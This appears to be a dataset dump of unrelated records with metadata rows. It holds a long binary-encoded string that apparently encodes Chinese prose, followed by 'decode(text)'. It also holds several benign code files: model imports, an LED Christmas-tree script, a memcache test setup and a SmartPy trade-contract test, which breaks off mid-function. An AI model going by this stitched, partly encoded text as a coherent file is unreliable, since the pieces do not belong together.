1000111111011001 111100111001101 1000100001100011 110011100001101 100111000001010 111001111101101 1111111100001100 110001000010001 101111110001000 111010100011111 110110000010100 1111111100001100 101011100101000 101010001101000 100111100011010 111111110100100 1001000111001100 1001011101100010 101001111010001 1000000100111110 110110000010100 11000000000010 101010000001110 110011101100101 1000111111011000 110011000101111 101100101111101 101100100011010 100111000111011 100111011111011 110001010001010 100111011010110 100111011101100 1000000111101010 101110111110001 111100111010001 101101110100100 1000010111001111 111011010000100 1000100001100011 110011100001101 1001000011111101 111111011011001 110001000010001 100111010000110 11000000000010 1010 1010 1000111111011000 110011100001001 101010000000011 1001100101101101 1001010111101110 1001100010011000 11000000000010 111010111000101 100111010111010 101100100011010 111011010000100 110010111110110 101000000011001 111101110100001 111010000000110 110110111110111 100111001110001 1111111100001100 100111011010110 100111011101100 110100000111001 110011100101100 110000011110011 100111000001101 101001000110000 110000000100101 1000101111001010 111100111010001 1000111111011000 101110111101110 100111000011100 1000100101111111 101010000000011 1111111100001100 101111110001000 101100100011010 111100111010001 101101110100100 100111000001011 111001111101101 100111010000110 1001000011111101 110011100001001 101010000000011 111011010000100 101010110011101 111011010000100 1111111100001100 110010001000110 100111000000000 101100100100111 110001110010010 1111111100001100 110001000010001 100111011101100 1000111111011001 1001000111001100 100111011000000 100111001001000 1001000011111101 110110010100001 110011100001001 1111111100001100 101001111010001 111000011101101 1001010111101000 1000101111001010 111011010000100 101111110101110 100111111100001 111111110100100 1001000111001100 1111111100001100 110011100001001 101001100111011 111010100011111 110001010110001 110000000101000 1111111100001100 11000000001100 110001000010001 100111011101100 110000000100101 1000101111001010 111100111010001 101001111101010 110011100001001 111111010111000 101110000111111 1000100011100100 10000000100110 10000000100110 11000000001101 110001000010001 100111011101100 101011100101000 110011100000000 101001001001101 111111010111111 110001000011000 110010110010111 1111111100001100 111111011010011 110011110011100 110011000101111 1000111111011001 110100000110111 1111111100001100 110011100001001 110010111110110 101000000011001 101111111000011 1001000111001100 111011100011111 111011010000100 101111110001000 110110000010100 11000000000010 1010 1010 110001000010001 100111011101100 1000111111011001 100111000101010 1001011011000110 100111101010011 111011100011111 111011010000100 110011000101111 101111110001000 101100101111101 1111111100001100 101100100100111 101101110110110 1001000011111101 110011000101111 101001111101010 110011100001001 111010100011111 111010111000101 100111010000110 110001001001101 100111000001011 111000001101011 111111010111111 11000000000010 1000111111011001 110101100100001 1111111100001100 110001000010001 100111011101100 110000000100101 1000101111001010 111100111010001 110011100001001 110100 110000 101100100011010 100111000101010 100111010111010 110000100011111 110011111010011 100111010000110 11000000000010 110001000010001 110001010001010 110001001000000 110011100001001 111010100011111 111010111000101 111011010000100 100111010111010 101111011111010 100111010000110 100111000000000 100111000101010 111111110100100 1111111100001100 110011100101100 110011101100101 101001111101011 11000000001100 110000000100101 1000101111001010 111010100011111 111010111000101 111111110100100 11000000001101 1111111100001100 110001010100100 101100011101011 1001010101111111 1000101111110100 100111000001101 101010000001001 101001000101001 1111111100001100 110010100111001 110001000010000 11000000001100 110000000100101 1000101111001010 101001010100000 110110010111001 111111110100100 11000000001101 11000000000010 101110000110001 110011000101111 111010100011111 111010111000101 111011010000100 100111010111010 100111001011111 110110010100001 110011100001001 101111110001000 110000010110010 100111100100100 11000000000001 101111110001000 111111011011101 110011100011011 11000000000001 101111110001000 110001010110001 110000000101000 111011010000100 101111111000011 110000000000001 1111111100001100 1001000011111101 110011000101111 1000011011101110 111100111101111 110011110000001 111011010000100 1111111100001100 101110000110001 110011000101111 101100100100111 101101110110110 100111010010010 111011011111000 101111000101110 101001010101001 1111111100001100 101000101110001 101111010100110 1001011010111110 101000101110011 1001000010100011 111100111001101 101111111000011 110000000000001 11000000000010 1010 1010 1000111111011001 100111010011011 101101101101001 101101101010000 100111011101100 11000000000001 101111001110100 1000111101111011 100111010111010 1001000011111101 1001011101011110 101111000111000 101100101111101 1111111100001100 101110000110001 110011000101111 1000110111011111 111011101000000 110001000010001 101001111010111 101100111010100 101110001001000 100111010000110 11000000000010 110001000010001 100111001011111 101111000001100 110011100011011 1000111111011001 110101100100001 111010110101011 110000011000101 1000111111000111 101010000001110 1111111100001100 101011011111101 101101110110110 1000000011111101 101001010100000 101100100100111 101101111111001 110000000100101 1000101111001010 111100111010001 111011010000100 110001010010101 101000101100101 1111111100001100 101011100101000 101111110001000 101100100011010 101011011111101 101101110110110 111011010000100 101001100111011 111010110010111 100111101010011 111110011111011 100111000101101 1111111100001100 110000000100101 1000101111001010 100111000010011 100111000011010 1001000011111101 110011000101111 1001011101011110 101111000111000 101001111010111 1001000111001101 1000100111000110 111011010000100 11000000000010 1010 1010 100111000001101 1000000011111101 1000111110111110 101001000110000 111011010000100 101111001111000 111100110001111 1010 1010 110010 110011100001000 110001 110111 101001111110111 1111111100001100 110001000010001 110010100110110 101001000110000 100111010000110 100111000000000 110011101100001 101111110101110 100111111100001 1111111100001100 110011000101111 1001000010100011 100111000101010 101010000001100 110110101001110 101001100111011 1001011001100010 111011010000100 101010000001100 101101101100110 101001111010001 111111011011001 110001000010001 111011010000100 1111111100001100 100111011010110 1000110111011111 110001000010001 1000101111110100 11000000001100 101101111111001 100111000001101 1000110101110111 11000000001101 1111111100001100 110001000010001 1000101111110100 1111111100011010 101111001111000 101100101111101 100111101100000 100111100100000 101000111111010 101001110111011 100111010000110 1111111100001100 101001111001010 110010111110110 110001111010000 1001000110010010 100111010000110 100111000000000 1001000011101000 101001000000110 100111010111010 11000000000010 100111011010110 101100110000010 110011110011100 100111000001101 100111100100000 101000111111010 101001110111011 111011010000100 1000101111011101 1111111100001100 101001111101111 1000000011111101 101110000110001 110110010100001 110011100001001 110011101001110 110010110000111 100111010101110 100111011010110 100111011101100 1000111111011001 111000 100111000101010 100111010111010 1111111100001100 111011111100101 1001000001010011 111011010000100 100111010111010 101001111101111 1000000011111101 101110000110001 100111100011010 110011011110100 101110000010001 11000000000010 1010 1010 1000111111011001 110101100100001 1111111100001100 110001000010001 100111011101100 110011100001001 100111000001001 100111000101010 101100101110011 101001100111011 111010100011111 101000101101000 101101110110110 110000100011111 110011111010011 11000000000010 100111000100100 100111000101010 101100101110011 101001100111011 111010100011111 111011010000100 101000101101100 101000101101100 11000000000001 101101001000110 101101001000110 101001010100000 1000000000000001 101000101101100 110000100011111 110011111010011 1111111100001100 100111000000000 100111000101010 101100101110011 101001100111011 111010100011111 111011010000100 111001000111000 111001000111000 11000000000001 101100110001000 101100110001000 11000000000001 101100111010000 101100111010000 11000000000001 1000000000000001 101000101101100 1111111100001100 101001010100000 101100101111001 1000000111101010 101110111110001 110101 100111000101010 100111010111010 110000100011111 110011111010011 11000000000010 101100100100111 101101110110110 1001000011111101 1000100111001001 101111110010111 1000111111011001 100111001001000 110010111101001 101110000110001 101001111010001 111001110110000 1000111111011001 100111000101010 111010111000101 110101111010010 1111111100001100 111111011010011 110011110011100 101001101110100 110011000101111 1000111111011001 110100000110111 1111111100001100 1001000000100000 110001000010000 1000111111011001 100111001001000 101100100100111 111011010000100 110001101011111 101100100110001 1111111100001100 100111011100011 100111011110111 101100100101010 110000011101000 1001000111001101 100111010000110 11000000000010 1010 1010 1000111111011001 111100111001101 100111011100011 100111011110111 100111101010011 111001110110000 101011100101000 110010110111001 110010110111001 1001011101100010 1001011101100010 11000000000010 1001011001100100 100111010000110 101001110111011 100111000010110 111011010000100 100111010111010 1111111100001100 110000010100011 111010111000101 111011010000100 100111010111010 100111001011111 101011100101000 110001001111111 101001111010111 11000000000010 1010 1010 110001000010001 100111011101100 11000000001100 110000000100101 1000101111001010 101001010100000 110110010111001 111111110100100 11000000001101 1001000111001100 1111111100001100 101100100100111 101101110110110 111111011001111 101111000111000 100111100011010 100111010100100 110110101000001 1000111010101011 100111101010011 111001010110110 101000110110101 1111111100001100 110011100001001 100111010111010 1001010111101110 101111111000011 111001110000111 110000000111011 101011100101000 110001 110010 110000 110101100100001 101111 101001000000110 1111111100001100 1000100110000001 100111000001101 1000100110000001 111110100100111 1111111100011111 1001000010100011 1000000010101111 101101110011010 1000100110000001 111110100100111 1111111100001100 100111000000000 101001010101000 101110000110001 101111111000011 110000101001100 1111111100001100 1000111111011001 101101111111001 100111011010110 100111011101100 111111011001000 1000111010101011 1001000011111101 100111100011010 110011100001001 101111101110001 101010011001101 111011010000100 1111111100001100 100111011100101 101010000001110 101111001110100 111111010101010 101100100100111 100111010000110 100111100011010 100111000001101 100111100011010 101111111000011 1000100001110000 1111111100011111 1000111111011001 1001000011111101 100111000001101 101100101111101 1000101111110100 11000000000010 100111011100101 101010000001110 101001000101011 100111010111010 101001111101111 100111011100101 101001110111011 111001000101100 101110001110001 1111111100001100 101000111111010 101001110111011 110010111000101 110111000111000 1111111100001100 100111011010110 100111011101100 101001111101111 1000000011111101 101110000110001 100111000001101 1000100001001100 1111111100001100 1001000010100011 1001000011111101 110011000101111 110011100001001 101001111101111 1000000011111101 111011010000100 11000000000010 1010 1010 1000111111011000 110011100001001 110101101100110 110110001001001 11000000000010 100111101100000 1000101111110100 110001000010001 100111011101100 110101101100110 110110001001001 110011000101111 100111000101010 101100100011010 111000011101101 1001010111111001 111011010000100 101011100110000 110010110111001 1111111100001100 111001110110000 101011100101000 100111000000000 1000110111101111 100111000001010 1001000011111101 110011000101111 101101110001001 101101110001001 1001011101011001 1001011101011001 111011010000100 1111111100001100 101111110001000 101100100011010 100111000011100 1000100101111111 100111001110000 100111000001101 101001000110000 1111111100001100 1000111111011000 110010000011110 101111110010111 101000101101000 101011011111101 1001000011111101 110011101100101 110010100101111 110001111110100 11000000000010 101001001001101 101000111100000 101100100101001 101111001111111 1000100101111111 111011010000100 100111000000000 100111000101010 101001100111011 111010110010111 1001011000011111 111011010000100 110001010100100 101100011101011 101011100101000 101110111100101 100111101011100 111011010000100 110010111110110 101000000011001 111101010000001 111000100110110 110011000001111 1000111111110111 100111010000110 1111111100001100 110001010100010 110010101010001 1111111100001100 101010000001110 110011101100101 100111010111010 101111111000011 1000110111110011 110011100001001 100111010000110 1111111100001100 100111101000110 1000111111011000 110011000101111 101011100101000 110011000001111 1000111111110111 11000000000010 101100101111001 101100110000010 110011110011100 100111000001101 110011101100101 111011010000100 1000101111011101 1111111100001100 101011100101000 101101110110110 1001000111001100 101001111101111 100111011100101 1000111111000111 101111110010111 101100101111101 101100101111101 111011010000100 1111111100001100 100111001011111 100111000001101 100111100011010 101000111111010 1000111111011001 111100111001101 110000100001111 101100100010110 11000000000010 110001001000000 100111011100101 1111111100001100 110001000010001 1000100111001001 101111110010111 110001000010001 100111011101100 110101100100000 101100100100111 101101110110110 111011010000100 100111010111010 110000011000101 1111111100001100 111011100011111 111011010000100 110011000101111 11000000000010 1010 1010 111111011001111 101001110000110 1000111111000111 1000111111011001 110101100100001 111011010000100 111010110101011 110000011000101 1111111100001100 101101111111001 101001100111011 1001011001100010 1001000111001100 101111110001000 101100100011010 100111010111010 111011010000100 110001001010011 101000111111011 1001000011111101 1001011101011110 101111000111000 101100100100111 11000000000010 110001000010001 100111000001011 1001011101100010 101100101111101 101000111100000 100111000101010 101001100111011 101001010100001 100111010111010 101010001011000 1001000011111101 110011100001001 100111010000110 1000111110011110 1000000001001100 111011010000100 110000011110011 110110011010101 1111111100001100 101001100000101 110001011101100 100111000000000 100111010011011 1001101010101000 101111001110010 11000000000010 101100100100111 101101110110110 100111001001011 101001001001101 101101111111001 100111010001110 1000111111011001 100111000101010 1000000001001100 100111000011010 111011010000100 1001000010100011 100111010011011 1000100111000010 101111111110101 11000000000001 101111000111000 1000101111000110 1001000011111101 1001011010111110 101000101001101 110011100001001 111000010111001 101001010101000 110010001000111 10000000010100 10000000010100 101110000110001 110011000101111 100111101100000 1000111111011001 100111001001000 101001010101010 101001010011011 101110111100101 100111101011100 101001000110000 101111010010101 101101111111001 100111000001101 101101111111001 1111111100011111 101110000110001 101000011001111 110110001011111 101101101100110 101111010000110 100111000000000 110100000110111 1111111100001100 100111011010110 101110111100101 100111101011100 101100100101010 1000101110100100 111011100011111 1111111100001100 101100100101010 101101111111001 111010111000101 100111010111010 101100101111101 1111111100001100 110101111001111 100111000000000 101111001110100 111011010000100 1000111111000111 101111001110100 1000111111000111 1000001010000010 1001000011111101 101011100101000 101000001011010 110001001001011 110011100101111 11000000000010 100111011001010 101100100101001 110011100001001 100111010111010 101001111010001 100111000000000 100111000101010 110110001011111 101101101100110 101111010000110 101100101110011 101000100111111 101000110011001 111011010000100 101111110101110 100111111100001 1111111100001100 1000101111110100 101100101111001 111001000111000 111001000111000 111011010000100 110010111110110 1001010111110100 101000101101000 1001000011101000 111111011011001 100111010000110 111010111000101 100111010111010 11000000000010 1010 1010 110001000010001 1000000111101010 101110111110001 100111001011111 110011100001001 1000111111000111 110010111100000 110010101110000 110101100100001 111011010000100 101111111110101 101100100110100 1111111100001100 110011000101111 100111000001101 110011000101111 100111001011111 101011011011110 101001000110000 101101110110110 101000001011010 100111000101010 101101110110110 101111010101101 100111000111011 101100110000111 1111111100011111 111010110101011 110000011000101 100111001001011 101010000001110 1111111100001100 110001000010001 101011111111010 110011100101100 100111000001010 110110010100001 101011011011110 101101110110110 1111111100001100 101010010001100 110001000010001 1000000000000001 101000101101100 100111101001111 101011100101000 101100100010110 1001011101100010 1111111100001100 110001000010001 101100110111001 101100110111001 101011100101000 101101110110110 101111000101110 110001000010001 111000101100111 1001100001111110 101101101101001 101101101010000 11000000000010 110001000010001 111011010000100 100111010001100 101101110011101 1001000011111101 100111000001101 1000101110100100 101111110010111 110001000010001 100111010000110 1111111100001100 100111011010110 111011100001011 1000100111000110 1001100010010001 101101111111001 110001000010001 110110010100001 110000100011111 1000100111001001 1111111100001100 110001000010001 101111110001000 101100100110001 1000010000111101 1111111100001100 110001000010001 111010100011111 1000111111011001 100111000101010 100111010001100 1000000011001110 100111000001101 101101110111001 110011000010011 1111111100001100 101000111111010 111010100011111 111011010000100 110010111110110 101000000011001 100111011010110 110011100001001 110001 110000 110010110100100 1111111100001100 101100110001010 101101000100000 111110011010110 101110000111111 111010111000101 110001000010001 100111001011111 101111110010111 100111010000110 1111111100001100 101001110011111 110011100101100 110001000010001 1000111111011000 100111000000000 111011011110100 101010110000010 101100101110110 111011010000100 1111111100001100 1000111111011001 100111000000000 110101100100001 100111001011111 110010110101101 100111010000110 101100101110110 10000000010100 10000000010100 101000001011010 1000111111011001 100111000101010 101000110110011 101101110011010 111011010000100 110010111110110 101000000011001 1111111100001100 110001000010001 110011100001001 111000010111001 1001011010111110 1000111111000111 1111111100001100 110001000010001 1000000000000001 101000101101100 101110000110001 1000110111011111 110001000010001 1000101111110100 1111111100001100 100111011010110 1000101111110100 100111010111010 111011010000100 100111000000000 111010100011111 1000000011111101 101100100011111 1001000001000111 101001000110000 100111000000000 100111011110110 1000111111011001 110100000110111 111011010000100 100111010001011 110000011000101 1111111100001100 101111001110110 100111000010100 100111101100000 100111000001101 101000101001001 110011000101111 101001111000010 100111000001110 1000000000000101 1111111100001100 100111101100000 1000111111011000 1000100110000001 101111000100110 100111000000000 100111000101010 101011011100010 1001011000011111 101001110111011 110001001010011 1000111111011001 101011100111010 100111011010111 1111111100001100 1001000010100011 100111001011111 110011000101111 100111000000000 100111011110110 101111110001000 110011100001001 110000100001111 100111001001001 111011010000100 100111010001011 110000011000101 1111111100001100 111101101001001 101110000000110 110011101100101 100111000000000 101001000000111 1001000011111101 110000001100010 101100100001101 110101101100011 101111000111000 100111011100101 101010000001110 101100100100111 101101110110110 101000110001101 101001110111011 101011011011110 101111111000110 1111111100001100 100111001011111 110011000101111 100111000000000 100111000101010 101111110001000 101101110011101 1000110100110101 111011010000100 111111011001111 101001110000110 11000000000010 1010 1010 110010 110011100001000 110010 110001 101001111110111 110010111101001 100111000001010 1001100010000110 101101111111100 101010010001100 110001000010001 1000110000001000 1000101111011101 1111111100001100 101000101110110 101101110011110 110001000010001 110000011110011 1001010111101110 101000111100000 100111000101010 1001010111101110 1001100010011000 1111111100001100 110101111010100 101100110000010 110011100001001 110110010100001 110011100001001 1000100111001001 101111110010111 1001000010100011 101100100101001 110001001111001 1000101111000100 110001000010001 110001001111001 1000101111000100 1001010100011001 100111010000110 1111111100011111 110001000010001 101111000001100 110011100011011 1000000011111101 101100100011111 111111011011001 110001000010001 100111000000000 100111000101010 1001000001010011 110101101001001 11000000000010 100111101000110 110011000101111 110001000010001 100111000001101 110010101100010 1001010111101110 11000000000010 110110010100001 110011100001001 100111010111010 101011100101000 100111011111011 100111101010101 101011100111010 101010000001000 1000110111011111 110001000010001 1000101111110100 1000100001101000 111100100111010 110001010110001 110101101001001 1000111111011001 101001111100101 1000101111011101 11000000000010 100111101000110 110001000010001 100111110011101 111000100110110 1000100111001001 101111110010111 1111111100001100 1000111111011001 110101100100001 111011010000100 100111010001011 110000011000101 110011011110100 101001010100000 1000101111110100 110011000001110 100111010000110 110101111001111 100111000101010 100111010111010 1000111111011000 110011000101111 1000100110000001 101011101011010 110001100000001 1000000111101010 101110111110001 111001011101100 111101011001011 111011010000100 110000000011101 110000011110011 1111111100001100 101011011100000 100111000111010 1000100110000001 110011100001001 100111010111010 111101011011001 101000111111010 110011101100101 1000101111110100 111011100011111 1000101111011101 1111111100001100 101111111000101 1001100001111011 1000100110000001 110011100001001 100111010111010 1111111100001100 1000111111011001 100111000101010 100111000010110 111010101001100 101111111000101 1001100001111011 1000100110000001 110011100001001 100111000001101 101010000001100 111011010000100 101100011110000 1001011111110011 1111111100001100 110011000101111 101010000100111 1111111100011111 1010 1010 100111101011100 100111000111010 110101101100110 110110001001001 100111010111010 1111111100001100 110001000010001 100111011101100 101010011101010 100111000000000 100111000101010 100111000001101 111000011101101 111001000110001 1000000111101010 101110111110001 111011010000100 101011111001110 101111000000010 1111111100011111 110001000010001 100111011101100 111001110110000 101011100101000 101011011011110 110000011110011 1000110101110111 110011101100101 100111011100101 101001001001101 1000111111000111 101111110010111 1001000010100011 111100111001101 110011100000000 110011001101110 1001000000011010 111011010000100 111010100011111 110110100111011 1111111100001100 110011000101111 101100100011010 100111001001000 101100101100010 100111110001000 111011010000100 101111001111000 111100110001111 11000000000010 110001000010001 111001110110000 101011100101000 1000100111001001 101111110010111 110001010001010 101101110011101 101101110011101 110001010110001 111011101000000 1111111100001100 1001011001101010 100111011010110 101000111111010 101001110111011 111001110101001 100111000000000 100111000001011 110111011010001 110100010101111 110001000010110 1000000000000101 1000110111011111 1000000000000001 101000101101100 101000111111010 101001110111011 111011100001011 100111000101010 111010100110101 101111101110001 1111111100001100 101011100101000 100111011100101 101001001001101 101000110001101 101111001110011 101111000111000 1001000011111101 100111000001101 1000111111000111 1111111100001100 101001000110000 111001110110000 101011100101000 110011101100101 1000101111110100 1001000011111101 110011000101111 100111000000000 111100111001101 101111001111000 111100110001111 1111111100001100 1001000011111101 110011000101111 100111000001101 1000000011111101 1000111110111110 101001000110000 111011010000100 101111001111000 111100110001111 11000000000010"
decode(text)
| 5,280.192308 | 136,848 | 0.935412 | 8,743 | 137,285 | 14.685577 | 0.110832 | 0.005234 | 0.011651 | 0.00317 | 0.152146 | 0.114793 | 0.09519 | 0.081077 | 0.077713 | 0.074551 | 0 | 0.997331 | 0.064049 | 137,285 | 25 | 136,849 | 5,491.4 | 0.001922 | 0 | 0 | 0.235294 | 0 | 0.058824 | 0.996955 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0 | 0 | 0.117647 | 0.117647 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7a5acbb190a1bd695ca281787eec29f623ad2b3f | 327 | py | Python | ravens/models/__init__.py | EricCousineau-TRI/deformable-ravens | 6ff2443ba7f6673ba4696484e052441262cc14d7 | [
"Apache-2.0"
] | 98 | 2020-12-23T02:32:01.000Z | 2022-03-30T07:09:59.000Z | ravens/models/__init__.py | EricCousineau-TRI/deformable-ravens | 6ff2443ba7f6673ba4696484e052441262cc14d7 | [
"Apache-2.0"
] | 8 | 2020-12-22T16:17:24.000Z | 2021-10-13T23:44:48.000Z | ravens/models/__init__.py | EricCousineau-TRI/deformable-ravens | 6ff2443ba7f6673ba4696484e052441262cc14d7 | [
"Apache-2.0"
] | 26 | 2020-12-22T16:14:11.000Z | 2022-03-03T10:27:29.000Z | from ravens.models.gt_state import MlpModel
from ravens.models.resnet import ResNet43_8s
from ravens.models.attention import Attention
from ravens.models.transport import Transport
from ravens.models.transport_goal import TransportGoal
from ravens.models.conv_mlp import ConvMLP
from ravens.models.regression import Regression
| 40.875 | 54 | 0.87156 | 46 | 327 | 6.108696 | 0.391304 | 0.24911 | 0.398577 | 0.177936 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010033 | 0.085627 | 327 | 7 | 55 | 46.714286 | 0.929766 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
8fcce66e723f1a660c65f5ab91c61908fae6faf6 | 1,587 | py | Python | scripts/row_by_row.py | limsim/rgbxmastree | d10aa7dc47bb2a296d81ac0d8b1d8f199cb82dda | [
"Apache-2.0"
] | 2 | 2021-12-05T21:19:06.000Z | 2021-12-13T04:34:10.000Z | scripts/row_by_row.py | limsim/rgbxmastree | d10aa7dc47bb2a296d81ac0d8b1d8f199cb82dda | [
"Apache-2.0"
] | 1 | 2021-12-05T21:40:32.000Z | 2021-12-06T21:03:15.000Z | scripts/row_by_row.py | limsim/rgbxmastree | d10aa7dc47bb2a296d81ac0d8b1d8f199cb82dda | [
"Apache-2.0"
] | 1 | 2021-11-11T18:12:58.000Z | 2021-11-11T18:12:58.000Z | from tree import RGBXmasTree
from colorzero import Color, Hue
from time import sleep
import random
tree = RGBXmasTree()
tree.brightness = 0.04
try:
rowOrder = [0,24,19,6,12,16,15,7,1,23,20,5,11,17,14,8,2,22,21,4,10,18,13,9]
row1 = [(1, 1, 1), (0, 0, 0), (0, 0, 0), (0, 0, 0), (0, 0, 0), (0, 0, 0), (1, 1, 1), (1, 1, 1), (0, 0, 0), (0, 0, 0), (0, 0, 0), (0, 0, 0), (1, 1, 1), (0, 0, 0), (0, 0, 0), (1, 1, 1), (1, 1, 1), (0, 0, 0), (0, 0, 0), (1, 1, 1), (0, 0, 0), (0, 0, 0), (0, 0, 0), (0, 0, 0), (1, 1, 1)]
row2 = [(1, 1, 1), (1, 1, 1), (0, 0, 0), (0, 0, 0), (0, 0, 0), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (0, 0, 0), (0, 0, 0), (1, 1, 1), (1, 1, 1), (0, 0, 0), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (0, 0, 0), (1, 1, 1), (1, 1, 1), (0, 0, 0), (0, 0, 0), (1, 1, 1), (1, 1, 1)]
row3 = [(1, 1, 1), (1, 1, 1), (1, 1, 1), (0, 0, 0), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1)]
allRows = [row1, row2, row3]
while True:
darkTree = [(0,0,0)] * 25
for j in range(3):
tree.value = allRows[j]
sleep(1)
tree.off()
# tree.value = [
# (1,1,1), (0,0,0), (0,0,0), (0,0,0), (0,0,0),
# (1,1,1), (1,1,1), (0,0,0), (0,0,0), (0,0,0),
# (0,0,0), (1,1,1), (0,0,0), (0,0,0), (1,1,1),
# (1,1,1), (0,0,0), (0,0,0), (1,1,1), (0,0,0),
# (0,0,0), (0,0,0), (0,0,0), (1,1,1), (0,0,0)
# ]
except KeyboardInterrupt:
tree.off()
tree.close() | 41.763158 | 284 | 0.383113 | 382 | 1,587 | 1.591623 | 0.146597 | 0.486842 | 0.631579 | 0.710526 | 0.493421 | 0.493421 | 0.493421 | 0.493421 | 0.493421 | 0.493421 | 0 | 0.298069 | 0.249527 | 1,587 | 38 | 285 | 41.763158 | 0.212427 | 0.15753 | 0 | 0.095238 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.190476 | 0 | 0.190476 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
890ba818ecf1a57a581739a5eea572fbefa172a3 | 98 | py | Python | memcachepool/tests/__init__.py | dudeitscesar/django-memcached-pool | b1521d5894174cf02720a6946c58249bd3995571 | [
"Apache-2.0"
] | 22 | 2015-01-05T16:21:10.000Z | 2021-03-15T11:59:57.000Z | memcachepool/tests/__init__.py | dudeitscesar/django-memcached-pool | b1521d5894174cf02720a6946c58249bd3995571 | [
"Apache-2.0"
] | 8 | 2015-01-05T18:18:24.000Z | 2022-01-19T14:30:09.000Z | memcachepool/tests/__init__.py | dudeitscesar/django-memcached-pool | b1521d5894174cf02720a6946c58249bd3995571 | [
"Apache-2.0"
] | 10 | 2015-01-27T00:21:22.000Z | 2021-06-25T17:09:18.000Z | import os
def setUp():
os.environ['DJANGO_SETTINGS_MODULE'] = 'memcachepool.tests.settings'
| 16.333333 | 72 | 0.734694 | 12 | 98 | 5.833333 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.132653 | 98 | 5 | 73 | 19.6 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0.5 | 0.5 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
8918123fbc39bf09677ed8df18381cde9705a4bd | 38 | py | Python | losses/xentropy_loss.py | mo-vic/standalone-center-loss | 49730909be09d4eefbd43511227f4e787ad8af51 | [
"MIT"
] | 9 | 2019-09-09T00:29:16.000Z | 2020-03-25T10:18:07.000Z | losses/xentropy_loss.py | mo-vic/ConvLSTM | ce4b57b9370563b1cc90e3e2d0266288dbe6236f | [
"MIT"
] | null | null | null | losses/xentropy_loss.py | mo-vic/ConvLSTM | ce4b57b9370563b1cc90e3e2d0266288dbe6236f | [
"MIT"
] | null | null | null | from torch.nn import CrossEntropyLoss
| 19 | 37 | 0.868421 | 5 | 38 | 6.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 38 | 1 | 38 | 38 | 0.970588 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
64df32d91b74150dfdaf7f131f5b370d59b832fd | 9,302 | py | Python | smart-contracts/metaverseTrade_test.py | i3games/the-swap | 2acc01ab26407c15cf8868290db47fae723ac7f2 | [
"MIT"
] | 5 | 2021-12-24T00:54:45.000Z | 2022-03-04T09:27:42.000Z | smart-contracts/metaverseTrade_test.py | i3games/the-swap | 2acc01ab26407c15cf8868290db47fae723ac7f2 | [
"MIT"
] | null | null | null | smart-contracts/metaverseTrade_test.py | i3games/the-swap | 2acc01ab26407c15cf8868290db47fae723ac7f2 | [
"MIT"
] | null | null | null | """Unit tests for the MetaverseTrade class.
"""
import smartpy as sp
# Import the metaverseTrade and fa2Contract modules
metaverseTrade = sp.io.import_script_from_url("file:metaverseTrade.py")
fa2Contract = sp.io.import_script_from_url("file:templates/fa2Contract.py")
def get_test_environment():
# Create the test accounts
user1 = sp.test_account("user1")
user2 = sp.test_account("user2")
user3 = sp.test_account("user3")
fa2_admin = sp.test_account("fa2_admin")
# Initialize the FA2 contract
fa2 = fa2Contract.FA2(
config=fa2Contract.FA2_config(),
admin=fa2_admin.address,
metadata=sp.utils.metadata_of_url("ipfs://aaa"))
# Initialize the metaverse trade contract
tradeContract = metaverseTrade.MetaverseTrade(
metadata=sp.utils.metadata_of_url("ipfs://bbb"),
fa2=fa2.address,
expiration_time=5)
# Add all the contracts to the test scenario
scenario = sp.test_scenario()
scenario += fa2
scenario += tradeContract
# Save all the variables in a test environment dictionary
testEnvironment = {
"scenario" : scenario,
"user1" : user1,
"user2" : user2,
"user3" : user3,
"fa2_admin" : fa2_admin,
"fa2" : fa2,
"tradeContract" : tradeContract}
